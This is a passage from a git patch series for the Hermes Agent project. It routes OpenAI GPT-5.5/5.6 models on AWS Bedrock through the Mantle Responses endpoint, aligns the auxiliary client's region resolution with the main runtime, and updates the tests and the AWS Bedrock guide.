"codex_responses", + "model": target_model, + "base_url": "https://bedrock-mantle.us-east-2.api.aws/openai/v1", + "api_key": "aws-sdk", + "bedrock_openai": True, + } + + monkeypatch.setattr( + "hermes_cli.runtime_provider.resolve_runtime_provider", fake_resolve + ) + + rt = moa_loop._slot_runtime({"provider": "bedrock", "model": "openai.gpt-5.5"}) + # _slot_runtime forwards the resolved endpoint unconditionally now. + assert rt["provider"] == "bedrock" + assert rt["model"] == "openai.gpt-5.5" + assert rt["base_url"] == "https://bedrock-mantle.us-east-2.api.aws/openai/v1" + assert rt["api_key"] == "aws-sdk" + + # The chokepoint preserves bedrock identity despite the explicit base_url + # (api_mode is forwarded to call_llm directly, not the resolver). + resolver_kwargs = {k: v for k, v in rt.items() if k != "api_mode"} + resolved_provider, _model, base_url, _api_key, _mode = _resolve_task_provider_model( + task="moa_reference", + **resolver_kwargs, + ) + assert resolved_provider == "bedrock" + assert base_url == "https://bedrock-mantle.us-east-2.api.aws/openai/v1" + + +def test_moa_slot_runtime_falls_back_on_resolution_error(monkeypatch): + """A slot whose provider can't be resolved still attempts the call with the + bare provider/model rather than aborting the whole MoA turn.""" + from agent import moa_loop From 16476fad10e84c52767881d644c235a537e256e6 Mon Sep 17 00:00:00 2001 From: Vinay Shah Date: Wed, 15 Jul 2026 00:27:01 -0700 Subject: [PATCH 061/161] feat(bedrock): add OpenAI GPT-5.6 family (Sol/Terra/Luna) to Mantle Responses routing GPT-5.6 Sol, Terra, and Luna went GA on Amazon Bedrock on 2026-07-13. Like GPT-5.5, they are served exclusively from the Bedrock Mantle OpenAI-compatible Responses endpoint (the model cards list bedrock-runtime/Converse as unsupported), so they ride the allowlist routing introduced for GPT-5.5: - Add openai.gpt-5.6-{sol,terra,luna} to BEDROCK_OPENAI_RESPONSES_MODEL_IDS so runtime resolution, auxiliary calls, and MoA slots all take the SigV4/bearer Mantle Responses path. - Surface the family in the curated Bedrock picker list. - Record the 272K context window from the AWS model cards for all four Mantle OpenAI models (previously fell back to the 128K default). - Generalize picker tests from the hardcoded single-model checks to the BEDROCK_OPENAI_RESPONSES_MODEL_IDS allowlist so future Mantle model additions do not require test surgery; add routing, picker, and context-length coverage for the 5.6 family. Docs: https://docs.aws.amazon.com/bedrock/latest/userguide/model-cards-openai.html --- agent/bedrock_adapter.py | 13 ++ hermes_cli/models.py | 3 + tests/agent/test_bedrock_integration.py | 42 ++++++ tests/hermes_cli/test_bedrock_model_picker.py | 121 ++++++++++++++++-- 4 files changed, 171 insertions(+), 8 deletions(-) diff --git a/agent/bedrock_adapter.py b/agent/bedrock_adapter.py index c930bc2a73..fbb908d048 100644 --- a/agent/bedrock_adapter.py +++ b/agent/bedrock_adapter.py @@ -67,6 +67,13 @@ _bedrock_control_client_cache: Dict[str, Any] = {} # Converse-capable continue to use the native Bedrock path. BEDROCK_OPENAI_RESPONSES_MODEL_IDS: Tuple[str, ...] = ( "openai.gpt-5.5", + # GPT-5.6 family (GA on Bedrock 2026-07-13): Sol (frontier), Terra + # (balanced), Luna (fast/affordable). All are Mantle-only — the model + # cards list bedrock-runtime/Converse as unsupported. + # https://docs.aws.amazon.com/bedrock/latest/userguide/model-cards-openai.html + "openai.gpt-5.6-sol", + "openai.gpt-5.6-terra", + "openai.gpt-5.6-luna", ) _BEDROCK_OPENAI_HOST_RE = re.compile( r"^bedrock-mantle\.([a-z0-9-]+)\.api\.aws$", re.IGNORECASE @@ -1602,6 +1609,12 @@ BEDROCK_CONTEXT_LENGTHS: Dict[str, int] = { "mistral.mistral-large": 128_000, # DeepSeek "deepseek.v3": 128_000, + # OpenAI on Bedrock (Mantle/Responses route) + # https://docs.aws.amazon.com/bedrock/latest/userguide/model-cards-openai.html + "openai.gpt-5.5": 272_000, + "openai.gpt-5.6-sol": 272_000, + "openai.gpt-5.6-terra": 272_000, + "openai.gpt-5.6-luna": 272_000, } # Default for unknown Bedrock models diff --git a/hermes_cli/models.py b/hermes_cli/models.py index 00d8e732ad..16032fba27 100644 --- a/hermes_cli/models.py +++ b/hermes_cli/models.py @@ -673,6 +673,9 @@ _PROVIDER_MODELS: dict[str, list[str]] = { "us.anthropic.claude-haiku-4-5-20251001-v1:0", "us.anthropic.claude-sonnet-4-5-20250929-v1:0", "openai.gpt-5.5", + "openai.gpt-5.6-sol", + "openai.gpt-5.6-terra", + "openai.gpt-5.6-luna", "us.amazon.nova-pro-v1:0", "us.amazon.nova-lite-v1:0", "us.amazon.nova-micro-v1:0", diff --git a/tests/agent/test_bedrock_integration.py b/tests/agent/test_bedrock_integration.py index 9c50f38726..c8ef491e6b 100644 --- a/tests/agent/test_bedrock_integration.py +++ b/tests/agent/test_bedrock_integration.py @@ -77,6 +77,26 @@ class TestModelCatalog: models = _PROVIDER_MODELS.get("bedrock", []) assert "openai.gpt-5.5" in models + def test_bedrock_models_include_openai_gpt56_family(self): + """The GPT-5.6 family (Sol/Terra/Luna, GA 2026-07-13) is Mantle-only + like GPT-5.5 and must be surfaced in the static Bedrock list.""" + from hermes_cli.models import _PROVIDER_MODELS + models = _PROVIDER_MODELS.get("bedrock", []) + for model_id in ("openai.gpt-5.6-sol", "openai.gpt-5.6-terra", "openai.gpt-5.6-luna"): + assert model_id in models + + def test_bedrock_openai_context_length_is_272k(self): + """AWS model cards list a 272K context window for the GPT-5.5/5.6 + Mantle models; make sure we do not fall back to the 128K default.""" + from agent.bedrock_adapter import get_bedrock_context_length + for model_id in ( + "openai.gpt-5.5", + "openai.gpt-5.6-sol", + "openai.gpt-5.6-terra", + "openai.gpt-5.6-luna", + ): + assert get_bedrock_context_length(model_id) == 272_000 + class TestResolveProvider: """Verify resolve_provider() handles bedrock correctly.""" @@ -183,6 +203,28 @@ class TestRuntimeProvider: assert result["api_key"] == "aws-sdk" assert result["bedrock_openai"] is True + def test_bedrock_openai_gpt56_family_routes_to_mantle_responses(self, monkeypatch): + """Every GPT-5.6 variant (Sol/Terra/Luna) must take the same Mantle + Responses route as GPT-5.5 — none of them are Converse models.""" + from hermes_cli.runtime_provider import resolve_runtime_provider + + monkeypatch.setenv("AWS_ACCESS_KEY_ID", "AKIAIO...MPLE") + monkeypatch.setenv("AWS_SECRET_ACCESS_KEY", "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY") + monkeypatch.setenv("AWS_REGION", "us-east-2") + + for model_id in ("openai.gpt-5.6-sol", "openai.gpt-5.6-terra", "openai.gpt-5.6-luna"): + with patch("hermes_cli.runtime_provider.resolve_provider", return_value="bedrock"), \ + patch("hermes_cli.runtime_provider._get_model_config", return_value={ + "provider": "bedrock", + "default": model_id, + }): + result = resolve_runtime_provider(requested="bedrock") + + assert result["api_mode"] == "codex_responses", model_id + assert result["model"] == model_id + assert result["base_url"] == "https://bedrock-mantle.us-east-2.api.aws/openai/v1" + assert result["bedrock_openai"] is True, model_id + # --------------------------------------------------------------------------- # providers.py integration diff --git a/tests/hermes_cli/test_bedrock_model_picker.py b/tests/hermes_cli/test_bedrock_model_picker.py index e514580031..7802592c47 100644 --- a/tests/hermes_cli/test_bedrock_model_picker.py +++ b/tests/hermes_cli/test_bedrock_model_picker.py @@ -20,6 +20,11 @@ from contextlib import contextmanager from types import ModuleType from unittest.mock import MagicMock, patch +from agent.bedrock_adapter import BEDROCK_OPENAI_RESPONSES_MODEL_IDS + +_MANTLE_MODELS = list(BEDROCK_OPENAI_RESPONSES_MODEL_IDS) +_MANTLE_SET = {m.lower() for m in _MANTLE_MODELS} + # --------------------------------------------------------------------------- # Shared helpers / fixtures @@ -73,8 +78,9 @@ class TestProviderModelIdsBedrock: assert "eu.anthropic.claude-sonnet-4-6-20250514-v1:0" in result assert "eu.anthropic.claude-haiku-4-5-20251015-v1:0" in result - assert "openai.gpt-5.5" in result - assert len(result) == len(_EU_MODELS) + 1 + for _m in _MANTLE_MODELS: + assert _m in result + assert len(result) == len(_EU_MODELS) + len(_MANTLE_MODELS) def test_region_determines_model_ids(self, monkeypatch): """Different regions produce different model ID prefixes (eu.* vs us.*).""" @@ -86,14 +92,42 @@ class TestProviderModelIdsBedrock: with patch("agent.bedrock_adapter.resolve_bedrock_region", return_value="us-east-1"): us_result = provider_model_ids("bedrock") - assert all(m.startswith("eu.") or m == "openai.gpt-5.5" for m in eu_result) - assert all(m.startswith("us.") or m == "openai.gpt-5.5" for m in us_result) - assert "openai.gpt-5.5" in eu_result - assert "openai.gpt-5.5" in us_result + assert all(m.startswith("eu.") or m.lower() in _MANTLE_SET for m in eu_result) + assert all(m.startswith("us.") or m.lower() in _MANTLE_SET for m in us_result) + for _m in _MANTLE_MODELS: + assert _m in eu_result + assert _m in us_result assert eu_result != us_result + # Should fall back to static table (may be empty or populated depending on + # the current static list, but must not crash and must be a list). + assert isinstance(result, list) + + def test_falls_back_to_static_list_on_exception(self, monkeypatch): + """When discover_bedrock_models() raises, fall back gracefully.""" + from hermes_cli.models import provider_model_ids + + with patch("agent.bedrock_adapter.discover_bedrock_models", + side_effect=Exception("boto3 not installed")), \ + patch("agent.bedrock_adapter.resolve_bedrock_region", return_value="eu-central-1"): + result = provider_model_ids("bedrock") + + assert isinstance(result, list) # no crash + + def test_accepts_bedrock_aliases(self, monkeypatch): + """Provider aliases (aws, aws-bedrock, amazon) should also trigger live discovery.""" + from hermes_cli.models import provider_model_ids + + _expected_ids = [m["id"] for m in _US_MODELS] + + with patch("agent.bedrock_adapter.discover_bedrock_models", side_effect=_mock_discover), \ + patch("agent.bedrock_adapter.resolve_bedrock_region", return_value="us-east-1"): + for alias in ("aws", "aws-bedrock", "amazon-bedrock"): + result = provider_model_ids(alias) + assert result == _expected_ids + _MANTLE_MODELS, \ + f"alias {alias!r} should return live-discovered US model IDs, got {result!r}" # --------------------------------------------------------------------------- @@ -106,6 +140,59 @@ class TestListAuthenticatedProvidersBedrock: + bedrock = next((p for p in providers if p["slug"] == "bedrock"), None) + assert bedrock is not None, "bedrock should appear when AWS credentials are present" + + def test_bedrock_uses_live_discovery_not_static_list(self, monkeypatch): + """Model IDs come from discover_bedrock_models(), not the static _PROVIDER_MODELS table.""" + from hermes_cli.model_switch import list_authenticated_providers + + monkeypatch.setenv("AWS_PROFILE", "my-sso-profile") + + with patch("agent.bedrock_adapter.has_aws_credentials", return_value=True), \ + patch("agent.bedrock_adapter.discover_bedrock_models", side_effect=_mock_discover), \ + patch("agent.bedrock_adapter.resolve_bedrock_region", return_value="eu-central-1"): + providers = list_authenticated_providers(current_provider="bedrock") + + bedrock = next((p for p in providers if p["slug"] == "bedrock"), None) + assert bedrock is not None + + # All returned model IDs should have eu.* prefix — live discovery result + for _m in _MANTLE_MODELS: + assert _m in bedrock["models"] + for model_id in bedrock["models"]: + assert model_id.startswith("eu.") or model_id.lower() in _MANTLE_SET, \ + f"Expected eu.* or Bedrock OpenAI model ID from live discovery, got {model_id!r}" + + def test_bedrock_total_models_matches_discovery(self, monkeypatch): + """total_models reflects the actual discovered count.""" + from hermes_cli.model_switch import list_authenticated_providers + + monkeypatch.setenv("AWS_PROFILE", "my-sso-profile") + + with patch("agent.bedrock_adapter.has_aws_credentials", return_value=True), \ + patch("agent.bedrock_adapter.discover_bedrock_models", return_value=_EU_MODELS), \ + patch("agent.bedrock_adapter.resolve_bedrock_region", return_value="eu-central-1"): + providers = list_authenticated_providers(current_provider="openai") + + bedrock = next((p for p in providers if p["slug"] == "bedrock"), None) + assert bedrock is not None + assert bedrock["total_models"] == len(_EU_MODELS) + len(_MANTLE_MODELS) + + def test_bedrock_is_current_when_selected(self, monkeypatch): + """is_current=True when current_provider matches bedrock.""" + from hermes_cli.model_switch import list_authenticated_providers + + monkeypatch.setenv("AWS_PROFILE", "my-sso-profile") + + with patch("agent.bedrock_adapter.has_aws_credentials", return_value=True), \ + patch("agent.bedrock_adapter.discover_bedrock_models", return_value=_EU_MODELS), \ + patch("agent.bedrock_adapter.resolve_bedrock_region", return_value="eu-central-1"): + providers = list_authenticated_providers(current_provider="bedrock") + + bedrock = next((p for p in providers if p["slug"] == "bedrock"), None) + assert bedrock is not None + assert bedrock["is_current"] is True def test_bedrock_not_shown_without_credentials(self, monkeypatch): """Bedrock must not appear when no AWS credentials are present.""" @@ -171,11 +258,29 @@ class TestBedrockRegionRouting: bedrock = next((p for p in providers if p["slug"] == "bedrock"), None) assert bedrock is not None - assert "openai.gpt-5.5" in bedrock["models"] + for _m in _MANTLE_MODELS: + assert _m in bedrock["models"] for model_id in bedrock["models"]: - assert model_id.startswith("eu.") or model_id == "openai.gpt-5.5", \ + assert model_id.startswith("eu.") or model_id.lower() in _MANTLE_SET, \ f"Expected eu.* or Bedrock OpenAI model ID from eu-central-1 profile, got {model_id!r}" + def test_us_region_from_env_var_yields_us_models(self, monkeypatch): + """Explicit AWS_REGION=us-east-1 returns us.* model IDs.""" + from hermes_cli.model_switch import list_authenticated_providers + + monkeypatch.setenv("AWS_REGION", "us-east-1") + + with patch("agent.bedrock_adapter.has_aws_credentials", return_value=True), \ + patch("agent.bedrock_adapter.discover_bedrock_models", side_effect=_mock_discover): + providers = list_authenticated_providers(current_provider="bedrock") + + bedrock = next((p for p in providers if p["slug"] == "bedrock"), None) + assert bedrock is not None + for _m in _MANTLE_MODELS: + assert _m in bedrock["models"] + for model_id in bedrock["models"]: + assert model_id.startswith("us.") or model_id.lower() in _MANTLE_SET, \ + f"Expected us.* or Bedrock OpenAI model ID from us-east-1, got {model_id!r}" def test_env_var_takes_priority_over_botocore_profile(self, monkeypatch): """AWS_REGION env var wins over botocore profile region.""" From 41ca67c5b13489272150d1250bb1e4d5a0a19178 Mon Sep 17 00:00:00 2001 From: Vinay Shah Date: Thu, 16 Jul 2026 15:37:31 -0700 Subject: [PATCH 062/161] fix(bedrock): align auxiliary region resolution with runtime + document Mantle route Address review feedback on #65076: - Add resolve_bedrock_runtime_region() to agent/bedrock_adapter.py: the config-first region resolution (bedrock.region in config.yaml, then AWS_REGION/AWS_DEFAULT_REGION/botocore profile/us-east-1) that the main runtime resolver uses, exposed as a shared helper. - Switch auxiliary client resolution (agent/auxiliary_client.py aws_sdk branch) to the new helper. Previously it derived its region with bare resolve_bedrock_region() (env-first), so when config.yaml pinned bedrock.region to a different region than the ambient AWS env, auxiliary calls (compression, memory, vision) left the primary runtime's region. Both the AnthropicBedrock/Converse path and the new Mantle OpenAI Responses path now resolve identically to the main runtime. - Add regression tests covering the bedrock.region-vs-AWS_REGION mismatch for both the Claude auxiliary path and the Mantle auxiliary path. - Update website/docs/guides/aws-bedrock.md: the guide claimed Hermes never uses the OpenAI-compatible endpoint, which the Mantle route made stale. Document the triple routing (AnthropicBedrock / Mantle OpenAI Responses / Converse), the Mantle auth model (bearer token or SigV4), and add the GPT-5.5/5.6 model IDs to the models table. --- agent/auxiliary_client.py | 8 +- agent/bedrock_adapter.py | 30 ++++ hermes_cli/runtime_provider.py | 4 +- tests/agent/test_bedrock_integration.py | 134 +++++++++++++++++- tests/hermes_cli/test_bedrock_model_picker.py | 12 -- website/docs/guides/aws-bedrock.md | 20 ++- 6 files changed, 188 insertions(+), 20 deletions(-) diff --git a/agent/auxiliary_client.py b/agent/auxiliary_client.py index c436673268..7322a14b9a 100644 --- a/agent/auxiliary_client.py +++ b/agent/auxiliary_client.py @@ -7006,7 +7006,7 @@ def resolve_provider_client( from agent.bedrock_adapter import ( has_aws_credentials, is_anthropic_bedrock_model, - resolve_bedrock_region, + resolve_bedrock_runtime_region, is_openai_bedrock_model, bedrock_openai_base_url, resolve_bedrock_bearer_token, @@ -7023,7 +7023,11 @@ def resolve_provider_client( "no AWS credentials found") return None, None - region = resolve_bedrock_region() + # Region must match the main runtime's resolution (bedrock.region in + # config.yaml first, then env/profile) — see review on #53880/#65076: + # a bare resolve_bedrock_region() here let auxiliary calls (compression, + # memory, vision) leave the primary runtime's configured region. + region = resolve_bedrock_runtime_region() default_model = "anthropic.claude-haiku-4-5-20251001-v1:0" final_model = _normalize_resolved_model(model or default_model, provider) or default_model diff --git a/agent/bedrock_adapter.py b/agent/bedrock_adapter.py index fbb908d048..d39767fcc4 100644 --- a/agent/bedrock_adapter.py +++ b/agent/bedrock_adapter.py @@ -543,6 +543,36 @@ def resolve_bedrock_region(env: Optional[Dict[str, str]] = None) -> str: return "us-east-1" +def resolve_bedrock_runtime_region(config: Optional[Dict[str, Any]] = None) -> str: + """Resolve the Bedrock region with the same priority as the main runtime. + + Priority (matches the runtime provider resolver in + ``hermes_cli/runtime_provider.py``): + 1. ``bedrock.region`` in config.yaml + 2. ``resolve_bedrock_region()`` (AWS_REGION / AWS_DEFAULT_REGION / + botocore profile / us-east-1) + + Callers that already hold a loaded config dict should pass it to avoid a + disk read; when *config* is None the config is loaded read-only. Every + non-runtime call site that constructs a Bedrock endpoint (auxiliary + client resolution, model discovery for the picker) must use this helper — + using bare ``resolve_bedrock_region()`` there lets auxiliary calls leave + the primary runtime's configured region when ``bedrock.region`` and the + ambient AWS env/profile disagree. + """ + if config is None: + try: + from hermes_cli.config import load_config_readonly + config = load_config_readonly() + except Exception: + config = {} + bedrock_cfg = (config or {}).get("bedrock") or {} + cfg_region = str(bedrock_cfg.get("region") or "").strip() + if cfg_region: + return cfg_region + return resolve_bedrock_region() + + def bedrock_model_ids_or_none() -> Optional[List[str]]: """Live-discover Bedrock model IDs for the active region. diff --git a/hermes_cli/runtime_provider.py b/hermes_cli/runtime_provider.py index d3d54e3ed5..2058f9d642 100644 --- a/hermes_cli/runtime_provider.py +++ b/hermes_cli/runtime_provider.py @@ -2257,7 +2257,9 @@ def resolve_runtime_provider( ) # Read bedrock-specific config from config.yaml _bedrock_cfg = load_config().get("bedrock", {}) - # Region priority: config.yaml bedrock.region → env var → us-east-1 + # Region priority: config.yaml bedrock.region → env var → us-east-1. + # Same resolution as resolve_bedrock_runtime_region() in + # agent/bedrock_adapter.py — auxiliary calls must agree with this. region = (_bedrock_cfg.get("region") or "").strip() or resolve_bedrock_region() auth_source = resolve_aws_auth_env_var() or "aws-sdk-default-chain" # Build guardrail config if configured diff --git a/tests/agent/test_bedrock_integration.py b/tests/agent/test_bedrock_integration.py index c8ef491e6b..890f51fe2b 100644 --- a/tests/agent/test_bedrock_integration.py +++ b/tests/agent/test_bedrock_integration.py @@ -208,7 +208,7 @@ class TestRuntimeProvider: Responses route as GPT-5.5 — none of them are Converse models.""" from hermes_cli.runtime_provider import resolve_runtime_provider - monkeypatch.setenv("AWS_ACCESS_KEY_ID", "AKIAIO...MPLE") + monkeypatch.setenv("AWS_ACCESS_KEY_ID", "AKIAIOSFODNN7EXAMPLE") monkeypatch.setenv("AWS_SECRET_ACCESS_KEY", "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY") monkeypatch.setenv("AWS_REGION", "us-east-2") @@ -472,8 +472,88 @@ class TestAuxiliaryClientBedrockResolution: assert client is None assert model is None + def test_bedrock_config_region_beats_env_region(self, monkeypatch): + """bedrock.region in config.yaml must win over AWS_REGION for auxiliary + calls — the same priority the main runtime resolver uses. + Regression for the #65076 review: auxiliary resolution derived its + region with bare resolve_bedrock_region() (env-first), so when + config.yaml pinned bedrock.region to a different region than the + ambient AWS env, auxiliary calls (compression, memory, vision) left + the primary runtime's region. + """ + monkeypatch.setenv("AWS_ACCESS_KEY_ID", "AKIAIOSFODNN7EXAMPLE") + monkeypatch.setenv("AWS_SECRET_ACCESS_KEY", "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY") + monkeypatch.setenv("AWS_REGION", "eu-central-1") + with patch("hermes_cli.config.load_config_readonly", + return_value={"bedrock": {"region": "us-west-2"}}), \ + patch("agent.anthropic_adapter.build_anthropic_bedrock_client", + return_value=MagicMock()): + from agent.auxiliary_client import resolve_provider_client + client, _ = resolve_provider_client("bedrock", None) + + assert client is not None + assert "us-west-2" in client.base_url, ( + "auxiliary Bedrock client ignored config.yaml bedrock.region — " + "it must match the main runtime's region priority" + ) + + def test_bedrock_mantle_config_region_beats_env_region(self, monkeypatch): + """Same config-over-env priority for the Mantle (OpenAI Responses) path.""" + monkeypatch.setenv("AWS_ACCESS_KEY_ID", "AKIAIOSFODNN7EXAMPLE") + monkeypatch.setenv("AWS_SECRET_ACCESS_KEY", "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY") + monkeypatch.setenv("AWS_REGION", "eu-central-1") + monkeypatch.setenv("AWS_BEARER_TOKEN_BEDROCK", "test-bearer") + + captured = {} + + class _FakeOpenAI: + def __init__(self, **kwargs): + captured.update(kwargs) + self.api_key = kwargs.get("api_key") + self.base_url = kwargs.get("base_url") + + def close(self): + pass + + with patch("hermes_cli.config.load_config_readonly", + return_value={"bedrock": {"region": "us-west-2"}}), \ + patch("agent.auxiliary_client.OpenAI", _FakeOpenAI): + from agent.auxiliary_client import resolve_provider_client + client, model = resolve_provider_client("bedrock", "openai.gpt-5.6-sol") + + assert client is not None + assert "us-west-2" in captured.get("base_url", ""), ( + "Mantle auxiliary base_url ignored config.yaml bedrock.region" + ) + + def test_bedrock_respects_explicit_model(self, monkeypatch): + """When caller passes an explicit model, it should be used.""" + monkeypatch.setenv("AWS_ACCESS_KEY_ID", "AKIAIOSFODNN7EXAMPLE") + monkeypatch.setenv("AWS_SECRET_ACCESS_KEY", "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY") + + with patch("agent.anthropic_adapter.build_anthropic_bedrock_client", + return_value=MagicMock()): + from agent.auxiliary_client import resolve_provider_client + _, model = resolve_provider_client( + "bedrock", "us.anthropic.claude-sonnet-4-5-20250929-v1:0" + ) + + assert "claude-sonnet" in model + + def test_bedrock_async_mode(self, monkeypatch): + """Async mode should return an AsyncAnthropicAuxiliaryClient.""" + monkeypatch.setenv("AWS_ACCESS_KEY_ID", "AKIAIOSFODNN7EXAMPLE") + monkeypatch.setenv("AWS_SECRET_ACCESS_KEY", "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY") + + with patch("agent.anthropic_adapter.build_anthropic_bedrock_client", + return_value=MagicMock()): + from agent.auxiliary_client import resolve_provider_client, AsyncAnthropicAuxiliaryClient + client, model = resolve_provider_client("bedrock", None, async_mode=True) + + assert client is not None + assert isinstance(client, AsyncAnthropicAuxiliaryClient) def test_bedrock_default_model_is_haiku(self, monkeypatch): """Default auxiliary model for Bedrock should be Haiku (fast, cheap).""" @@ -490,11 +570,61 @@ class TestAuxiliaryClientBedrockResolution: + def test_bedrock_claude_model_still_uses_anthropic_client(self, monkeypatch): + """Claude Bedrock IDs should keep the Anthropic SDK auxiliary path.""" + monkeypatch.setenv("AWS_ACCESS_KEY_ID", "AKIAIOSFODNN7EXAMPLE") + monkeypatch.setenv("AWS_SECRET_ACCESS_KEY", "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY") + + mock_anthropic_bedrock = MagicMock() + with patch("agent.anthropic_adapter.build_anthropic_bedrock_client", + return_value=mock_anthropic_bedrock): + from agent.auxiliary_client import ( + AnthropicAuxiliaryClient, + resolve_provider_client, + ) + client, model = resolve_provider_client( + "bedrock", "us.anthropic.claude-sonnet-4-5-20250929-v1:0" + ) + + assert isinstance(client, AnthropicAuxiliaryClient) + assert "claude-sonnet" in model + + def test_bedrock_non_claude_async_mode(self, monkeypatch): + """Async mode for non-Claude Bedrock should return AsyncBedrockAuxiliaryClient.""" + monkeypatch.setenv("AWS_ACCESS_KEY_ID", "AKIAIOSFODNN7EXAMPLE") + monkeypatch.setenv("AWS_SECRET_ACCESS_KEY", "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY") + + with patch("agent.anthropic_adapter.build_anthropic_bedrock_client"): + from agent.auxiliary_client import ( + AsyncBedrockAuxiliaryClient, + resolve_provider_client, + ) + client, _ = resolve_provider_client( + "bedrock", "openai.gpt-oss-20b-1:0", async_mode=True + ) + + assert isinstance(client, AsyncBedrockAuxiliaryClient) + + def test_bedrock_converse_shim_normalizes_string_stop(self, monkeypatch): + """OpenAI callers may pass stop='STR'; Converse requires a list.""" + monkeypatch.setenv("AWS_ACCESS_KEY_ID", "AKIAIOSFODNN7EXAMPLE") + monkeypatch.setenv("AWS_SECRET_ACCESS_KEY", "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY") + + from agent.auxiliary_client import BedrockAuxiliaryClient + + client = BedrockAuxiliaryClient("us-east-1", "openai.gpt-oss-20b-1:0") + with patch("agent.bedrock_adapter.call_converse") as mock_converse: + client.chat.completions.create( + model="openai.gpt-oss-20b-1:0", + messages=[{"role": "user", "content": "hi"}], + stop="STOP", + ) + assert mock_converse.call_args.kwargs["stop_sequences"] == ["STOP"] def test_bedrock_converse_shim_stream_returns_complete_response(self, monkeypatch): """stream=True is not supported by the shim — a complete response comes back and call_llm's streaming consumer downgrades gracefully.""" - monkeypatch.setenv("AWS_ACCESS_KEY_ID", "AKIAIO...MPLE") + monkeypatch.setenv("AWS_ACCESS_KEY_ID", "AKIAIOSFODNN7EXAMPLE") monkeypatch.setenv("AWS_SECRET_ACCESS_KEY", "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY") from agent.auxiliary_client import BedrockAuxiliaryClient diff --git a/tests/hermes_cli/test_bedrock_model_picker.py b/tests/hermes_cli/test_bedrock_model_picker.py index 7802592c47..7d8024bad0 100644 --- a/tests/hermes_cli/test_bedrock_model_picker.py +++ b/tests/hermes_cli/test_bedrock_model_picker.py @@ -99,12 +99,6 @@ class TestProviderModelIdsBedrock: assert _m in us_result assert eu_result != us_result - - - # Should fall back to static table (may be empty or populated depending on - # the current static list, but must not crash and must be a list). - assert isinstance(result, list) - def test_falls_back_to_static_list_on_exception(self, monkeypatch): """When discover_bedrock_models() raises, fall back gracefully.""" from hermes_cli.models import provider_model_ids @@ -137,12 +131,6 @@ class TestProviderModelIdsBedrock: class TestListAuthenticatedProvidersBedrock: """Bedrock should appear in the /model picker when AWS creds are present.""" - - - - bedrock = next((p for p in providers if p["slug"] == "bedrock"), None) - assert bedrock is not None, "bedrock should appear when AWS credentials are present" - def test_bedrock_uses_live_discovery_not_static_list(self, monkeypatch): """Model IDs come from discover_bedrock_models(), not the static _PROVIDER_MODELS table.""" from hermes_cli.model_switch import list_authenticated_providers diff --git a/website/docs/guides/aws-bedrock.md b/website/docs/guides/aws-bedrock.md index ec7b1224fc..4aed045cef 100644 --- a/website/docs/guides/aws-bedrock.md +++ b/website/docs/guides/aws-bedrock.md @@ -1,12 +1,22 @@ --- sidebar_position: 14 title: "AWS Bedrock" -description: "Use Hermes Agent with Amazon Bedrock — native Converse API, IAM authentication, Guardrails, and cross-region inference" +description: "Use Hermes Agent with Amazon Bedrock — native Converse API, Anthropic SDK routing, OpenAI models via Bedrock Mantle, IAM authentication, Guardrails, and cross-region inference" --- # AWS Bedrock -Hermes Agent supports Amazon Bedrock as a native provider using the **Converse API** — not the OpenAI-compatible endpoint. This gives you full access to the Bedrock ecosystem: IAM authentication, Guardrails, cross-region inference profiles, and all foundation models. +Hermes Agent supports Amazon Bedrock as a native provider. This gives you full access to the Bedrock ecosystem: IAM authentication, Guardrails, cross-region inference profiles, and all foundation models. + +Hermes routes each model family through the API that serves it best: + +| Model family | API route | Why | +|---|---|---| +| Anthropic Claude | Anthropic SDK (`AnthropicBedrock`) | Prompt caching, thinking budgets, adaptive thinking — features not exposed via Converse | +| OpenAI GPT-5.5 / GPT-5.6 (Sol, Terra, Luna) | Bedrock Mantle **OpenAI Responses** endpoint (`bedrock-mantle..api.aws/openai/v1`) | These models are Mantle-only — their model cards list bedrock-runtime/Converse as unsupported | +| Everything else (Nova, DeepSeek, Llama, GPT-OSS, …) | Native **Converse API** (`bedrock-runtime`) | Full Bedrock feature set: Guardrails, inference profiles, streaming | + +All three routes share the same AWS credential chain and region resolution — no separate configuration is needed. Requests to the Mantle endpoint are authenticated with `AWS_BEARER_TOKEN_BEDROCK` when set, or SigV4-signed via the standard boto3 credential chain otherwise. ## Prerequisites @@ -105,13 +115,17 @@ Bedrock models use **inference profile IDs** for on-demand invocation. The `herm | Claude Sonnet 4.6 | `us.anthropic.claude-sonnet-4-6` | Recommended — best balance of speed and capability | | Claude Opus 4.6 | `us.anthropic.claude-opus-4-6-v1` | Most capable | | Claude Haiku 4.5 | `us.anthropic.claude-haiku-4-5-20251001-v1:0` | Fastest Claude | +| OpenAI GPT-5.6 Sol | `openai.gpt-5.6-sol` | OpenAI frontier model (via Bedrock Mantle) | +| OpenAI GPT-5.6 Terra | `openai.gpt-5.6-terra` | Balanced (via Bedrock Mantle) | +| OpenAI GPT-5.6 Luna | `openai.gpt-5.6-luna` | Fast, affordable (via Bedrock Mantle) | +| OpenAI GPT-5.5 | `openai.gpt-5.5` | Previous OpenAI flagship (via Bedrock Mantle) | | Amazon Nova Pro | `us.amazon.nova-pro-v1:0` | Amazon's flagship | | Amazon Nova Micro | `us.amazon.nova-micro-v1:0` | Fastest, cheapest | | DeepSeek V3.2 | `deepseek.v3.2` | Strong open model | | Llama 4 Scout 17B | `us.meta.llama4-scout-17b-instruct-v1:0` | Meta's latest | :::info Cross-Region Inference -Models prefixed with `us.` use cross-region inference profiles, which provide better capacity and automatic failover across AWS regions. Models prefixed with `global.` route across all available regions worldwide. +Models prefixed with `us.` use cross-region inference profiles, which provide better capacity and automatic failover across AWS regions. Models prefixed with `global.` route across all available regions worldwide. OpenAI `openai.*` model IDs are served by Bedrock Mantle in the configured region and don't use inference-profile prefixes. ::: ## Switching Models Mid-Session From 5cb7b521cfa7a10380834d8e637aa7800441fbe0 Mon Sep 17 00:00:00 2001 From: Vinay Shah Date: Thu, 16 Jul 2026 15:58:02 -0700 Subject: [PATCH 063/161] refactor(bedrock): make resolve_bedrock_runtime_region the 